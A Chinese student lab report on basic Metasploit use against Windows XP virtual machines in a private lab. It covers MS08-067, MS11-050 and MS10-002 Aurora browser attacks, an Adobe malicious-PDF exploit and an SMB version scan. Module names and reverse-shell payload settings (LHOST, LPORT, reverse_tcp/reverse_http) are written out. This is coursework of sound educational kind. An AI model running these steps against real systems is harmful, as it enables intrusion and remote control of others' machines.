zoukankan      html  css  js  c++  java
  • 20155330 《网络对抗》 Exp5 MSF基础应用

    20155330 《网络对抗》 Exp5 MSF基础应用

    实践过程记录

    主动攻击实践:MS08_067漏洞攻击

    • 攻击机:kali
      • IP地址:192.168.124.132
    • 靶机:windows XP SP3 简体中文
      • IP地址:192.168.124.135
    • 输入命令use exploit/windows/smb/ms08_067_netapi
    • 设置参数
    set payload generic/shell_reverse_tcptcp反向回连
    set LHOST 192.168.124.132 
    set LPORT 5330 端口
    set RHOST 192.168.124.135
    set target 0
    
    • 并进行攻击exploit
    • 结果失败了。
    • 然后重新换了一台靶机windows XP SP3(English),重设了攻击目标地址。
    • 成功了,使用systeminfo查看靶机信息。

    针对浏览器攻击:MS11-050漏洞攻击

    • 攻击机:kali
      • IP地址:192.168.124.132
    • 靶机:Windows XP Professional SP3 简体中文
      • IP地址:192.168.124.135
    • use windows/browser/ms11_050_mshtml_cobjectelement使用该模块
    • 加载payloadset payload windows/meterpreter/reverese_http,并设置相应参数,打开服务exploit,发起渗透攻击。
    • 在靶机中启动IE 7浏览器,访问链接:http://192.168.124.132:8080/ms5330
    • 但是在kali攻击机中一直出错,回连没有成功。
    • 然后参考组长的博客,将攻击的目标漏洞换成了MS10_002_aurora

    针对浏览器攻击:MS10_002_aurora漏洞攻击

    • 攻击机:kali
      • IP地址:192.168.124.129
    • 靶机:Windows XP Professional SP3(English)
      • IP地址:192.168.124.136
    • 输入下图中的命令并执行攻击
    • 在靶机中启动IE 7浏览器,访问链接:http://192.168.124.132:8080/aurora.html
    • 本来是回连成功的,但是输入错了命令,然后只好重做了一遍。
    • 第二次生成了不同的网址
    • 回连成功后使用sysinfo查看靶机信息
    • 靶机ip地址

    针对客户端的攻击:Adobe渗透测试

    • 攻击机:kali
      • IP地址:192.168.124.129
    • 靶机:Windows XP Professional SP3 简体中文
      • IP地址:192.168.124.135
    • 进入windows/fileformat/adobe_cooltype_sing模块设定相关系数并生成相关文件5330.pdf
    • 将生成的pdf文件导入到靶机中运行,回连成功!可对靶机进行操作。
    • 在靶机中关闭PDF文档后,攻击机与靶机断开连接。

    辅助模块

    • 输入命令show auxiliary查看所有辅助模块
    • 选中其中一个模块进入。该模块是用于对smb的版本进行扫描,SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。。
    • 设置必要参数,并使用show options查看需要设置的消息
    • 使用命令run开启扫描,结果如下:

    实验后回答问题

    • exploit

      • 攻击。简单来说就是利用发现的安全漏洞或配置弱点对远程目标系统进行攻击。主要分为主动攻击和被动攻击。
    • payload

      • 攻击载荷。类似shellcode,在攻击渗透成功后对被感染计算机进行后门操作,达到攻击效果。
    • encode

      • 编码器。修改字符达到“免杀”目的。

    实验感受

    这次实验主要对Windows xp系统及其有关应用中的部分漏洞进行了攻击,从而也感受到了msf工具功能的强大。

  • 相关阅读:
    16.小程序request请求
    15.小程序接入百度地图获取地理位置
    14. 微信小程序之wxss
    13.小程序视图层的模板
    es6字符串几个方法的理解
    记一次仿京东首页的轮播图效果
    ES6中Promise使用方法
    关于新版VS编辑环境下提示fopen不安全的问题报C4996错误的解决办法
    css布局拓展
    HTML的表单元素
  • 原文地址:https://www.cnblogs.com/ashin-kl/p/8970059.html
Copyright © 2011-2022 走看看